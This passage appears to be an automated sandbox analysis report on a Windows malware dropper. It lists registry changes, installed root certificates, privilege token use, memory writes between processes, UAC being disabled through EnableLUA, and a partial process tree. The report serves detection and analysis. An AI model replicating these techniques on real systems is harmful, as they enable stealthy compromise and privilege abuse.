\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FilePicker_cw5n1h2txyewy%5Cresources.pri\1d75a03dc98eb7\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02grcmqafcyquvns\Provision Monday, November 08, 2021 08:24:33 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAD3BBhn9bckmDrgxwt2/KowAAAAACAAAAAAAQZgAAAAEAACAAAADswsNyBtmVaotI+En6zEBRUeEQYcheTSY9zNvCWY+RtAAAAAAOgAAAAAIAACAAAAC03+rXo5oIFmOXZzImlcFwKAbHaGwIjg+v++XR2vRJMCAAAABy5XXJRtzD52ZHiwWHn66OD8WTj3uUaVtuyVqtYlGdG0AAAADTt+LEMYpMHh6kkfegnK7VD6P2r1Z6ZYg6A+5EULyO9ivmo5lIRHVf/vFY2MYqPd0ZRJi7LazPr62i1p3v3N//" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{EDDDE615-9E7D-49AB-8644-ABE5B013D13E} Calculator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 4616 PING.EXE 6860 PING.EXE 4604 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4872 powershell.exe 4872 powershell.exe 4384 powershell.exe 4384 powershell.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe 1812 Wed129eb9b8859.exe 1812 Wed129eb9b8859.exe 2280 Wed1229427acd4bc167.exe 2280 Wed1229427acd4bc167.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3196 Explorer.EXE -
Suspicious behavior: MapViewOfSection 10 IoCs
pid Process 5592 JoVBqle5ZuYZOmKRj95tPfGf.exe 5420 ArGiap3960SUZs1dAEDT_gNj.exe 1288 7elpvTmw1vT1ONC9ndp6H4va.exe 5420 ArGiap3960SUZs1dAEDT_gNj.exe 5420 ArGiap3960SUZs1dAEDT_gNj.exe 1288 7elpvTmw1vT1ONC9ndp6H4va.exe 1288 7elpvTmw1vT1ONC9ndp6H4va.exe 7540 8355.exe 6512 systray.exe 6512 systray.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 6728 msedge.exe 6728 msedge.exe 6728 msedge.exe 6728 msedge.exe 6728 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 9052 2208308.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2052 svchost.exe Token: SeCreatePagefilePrivilege 2052 svchost.exe Token: SeShutdownPrivilege 2052 svchost.exe Token: SeCreatePagefilePrivilege 2052 svchost.exe Token: SeShutdownPrivilege 2052 svchost.exe Token: SeCreatePagefilePrivilege 2052 svchost.exe Token: SeShutdownPrivilege 2516 svchost.exe Token: SeCreatePagefilePrivilege 2516 svchost.exe Token: SeDebugPrivilege 4872 powershell.exe Token: SeDebugPrivilege 4384 powershell.exe Token: SeDebugPrivilege 2348 Wed12ebaf7883e1890d.exe Token: SeRestorePrivilege 1912 WerFault.exe Token: SeBackupPrivilege 1912 WerFault.exe Token: SeBackupPrivilege 1912 WerFault.exe Token: SeDebugPrivilege 4584 Wed1241cc206cfb.exe Token: SeDebugPrivilege 4560 taskkill.exe Token: SeCreateTokenPrivilege 5932 schtasks.exe Token: SeAssignPrimaryTokenPrivilege 5932 schtasks.exe Token: SeLockMemoryPrivilege 5932 schtasks.exe Token: SeIncreaseQuotaPrivilege 5932 schtasks.exe Token: SeMachineAccountPrivilege 5932 schtasks.exe Token: SeTcbPrivilege 5932 schtasks.exe Token: SeSecurityPrivilege 5932 schtasks.exe Token: SeTakeOwnershipPrivilege 5932 schtasks.exe Token: SeLoadDriverPrivilege 5932 schtasks.exe Token: SeSystemProfilePrivilege 5932 schtasks.exe Token: SeSystemtimePrivilege 5932 schtasks.exe Token: SeProfSingleProcessPrivilege 5932 schtasks.exe Token: SeIncBasePriorityPrivilege 5932 schtasks.exe Token: SeCreatePagefilePrivilege 5932 schtasks.exe Token: SeCreatePermanentPrivilege 5932 schtasks.exe Token: SeBackupPrivilege 5932 schtasks.exe Token: SeRestorePrivilege 5932 schtasks.exe Token: SeShutdownPrivilege 5932 schtasks.exe Token: SeDebugPrivilege 5932 schtasks.exe Token: SeAuditPrivilege 5932 schtasks.exe Token: SeSystemEnvironmentPrivilege 5932 schtasks.exe Token: SeChangeNotifyPrivilege 5932 schtasks.exe Token: SeRemoteShutdownPrivilege 5932 schtasks.exe Token: SeUndockPrivilege 5932 schtasks.exe Token: SeSyncAgentPrivilege 5932 schtasks.exe Token: SeEnableDelegationPrivilege 5932 schtasks.exe Token: SeManageVolumePrivilege 5932 schtasks.exe Token: SeImpersonatePrivilege 5932 schtasks.exe Token: SeCreateGlobalPrivilege 5932 schtasks.exe Token: 31 5932 schtasks.exe Token: 32 5932 schtasks.exe Token: 33 5932 schtasks.exe Token: 34 5932 schtasks.exe Token: 35 5932 schtasks.exe Token: SeDebugPrivilege 5676 AdvancedRun.exe Token: SeDebugPrivilege 5660 AdvancedRun.exe Token: SeDebugPrivilege 6036 6736747.exe Token: SeImpersonatePrivilege 5660 AdvancedRun.exe Token: SeImpersonatePrivilege 5676 AdvancedRun.exe Token: SeTcbPrivilege 5732 svchost.exe Token: SeTcbPrivilege 5732 svchost.exe Token: SeDebugPrivilege 5152 Conhost.exe Token: SeDebugPrivilege 5644 503782.exe Token: SeShutdownPrivilege 3196 Explorer.EXE Token: SeCreatePagefilePrivilege 3196 Explorer.EXE Token: SeShutdownPrivilege 3196 Explorer.EXE Token: SeCreatePagefilePrivilege 3196 Explorer.EXE Token: SeShutdownPrivilege 3196 Explorer.EXE -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 7872 setup.tmp 6540 Calculator.exe 6728 msedge.exe 7160 installer.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3196 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1408 wrote to memory of 2972 1408 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe 82 PID 1408 wrote to memory of 2972 1408 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe 82 PID 1408 wrote to memory of 2972 1408 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe 82 PID 2972 wrote to memory of 2116 2972 setup_installer.exe 83 PID 2972 wrote to memory of 2116 2972 setup_installer.exe 83 PID 2972 wrote to memory of 2116 2972 setup_installer.exe 83 PID 2516 wrote to memory of 5080 2516 svchost.exe 88 PID 2516 wrote to memory of 5080 2516 svchost.exe 88 PID 2116 wrote to memory of 4284 2116 setup_install.exe 89 PID 2116 wrote to memory of 4284 2116 setup_install.exe 89 PID 2116 wrote to memory of 4284 2116 setup_install.exe 89 PID 2116 wrote to memory of 4012 2116 setup_install.exe 90 PID 2116 wrote to memory of 4012 2116 setup_install.exe 90 PID 2116 wrote to memory of 4012 2116 setup_install.exe 90 PID 2116 wrote to memory of 5016 2116 setup_install.exe 127 PID 2116 wrote to memory of 5016 2116 setup_install.exe 127 PID 2116 wrote to memory of 5016 2116 setup_install.exe 127 PID 4284 wrote to memory of 4384 4284 cmd.exe 91 PID 4284 wrote to memory of 4384 4284 cmd.exe 91 PID 4284 wrote to memory of 4384 4284 cmd.exe 91 PID 2116 wrote to memory of 720 2116 setup_install.exe 92 PID 2116 wrote to memory of 720 2116 setup_install.exe 92 PID 2116 wrote to memory of 720 2116 setup_install.exe 92 PID 2116 wrote to memory of 3216 2116 setup_install.exe 126 PID 2116 wrote to memory of 3216 2116 setup_install.exe 126 PID 2116 wrote to memory of 3216 2116 setup_install.exe 126 PID 4012 wrote to memory of 4872 4012 cmd.exe 93 PID 4012 wrote to memory of 4872 4012 cmd.exe 93 PID 4012 wrote to memory of 4872 4012 cmd.exe 93 PID 2116 wrote to memory of 1904 2116 setup_install.exe 94 PID 2116 wrote to memory of 1904 2116 setup_install.exe 94 PID 2116 wrote to memory of 1904 2116 setup_install.exe 94 PID 2116 wrote to memory of 3172 2116 setup_install.exe 114 PID 2116 wrote to memory of 3172 2116 setup_install.exe 114 PID 2116 wrote to memory of 3172 2116 setup_install.exe 114 PID 5016 wrote to memory of 3436 5016 cmd.exe 95 PID 5016 wrote to memory of 3436 5016 cmd.exe 95 PID 5016 wrote to memory of 3436 5016 cmd.exe 95 PID 2116 wrote to memory of 1560 2116 setup_install.exe 96 PID 2116 wrote to memory of 1560 2116 setup_install.exe 96 PID 2116 wrote to memory of 1560 2116 setup_install.exe 96 PID 2116 wrote to memory of 4188 2116 setup_install.exe 97 PID 2116 wrote to memory of 4188 2116 setup_install.exe 97 PID 2116 wrote to memory of 4188 2116 setup_install.exe 97 PID 2116 wrote to memory of 4192 2116 setup_install.exe 113 PID 2116 wrote to memory of 4192 2116 setup_install.exe 113 PID 2116 wrote to memory of 4192 2116 setup_install.exe 113 PID 2116 wrote to memory of 2224 2116 setup_install.exe 99 PID 2116 wrote to memory of 2224 2116 setup_install.exe 99 PID 2116 wrote to memory of 2224 2116 setup_install.exe 99 PID 3216 wrote to memory of 3764 3216 cmd.exe 111 PID 3216 wrote to memory of 3764 3216 cmd.exe 111 PID 3216 wrote to memory of 3764 3216 cmd.exe 111 PID 2116 wrote to memory of 1380 2116 setup_install.exe 110 PID 2116 wrote to memory of 1380 2116 setup_install.exe 110 PID 2116 wrote to memory of 1380 2116 setup_install.exe 110 PID 720 wrote to memory of 3292 720 cmd.exe 98 PID 720 wrote to memory of 3292 720 cmd.exe 98 PID 720 wrote to memory of 3292 720 cmd.exe 98 PID 3172 wrote to memory of 3832 3172 cmd.exe 112 PID 3172 wrote to memory of 3832 3172 cmd.exe 112 PID 3172 wrote to memory of 3832 3172 cmd.exe 112 PID 1904 wrote to memory of 440 1904 cmd.exe 100 PID 1904 wrote to memory of 440 1904 cmd.exe 100 -
System policy modification 1 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" hepatocyte.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 877E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" scriptwriters.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe"C:\Users\Admin\AppData\Local\Temp\9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2116 -
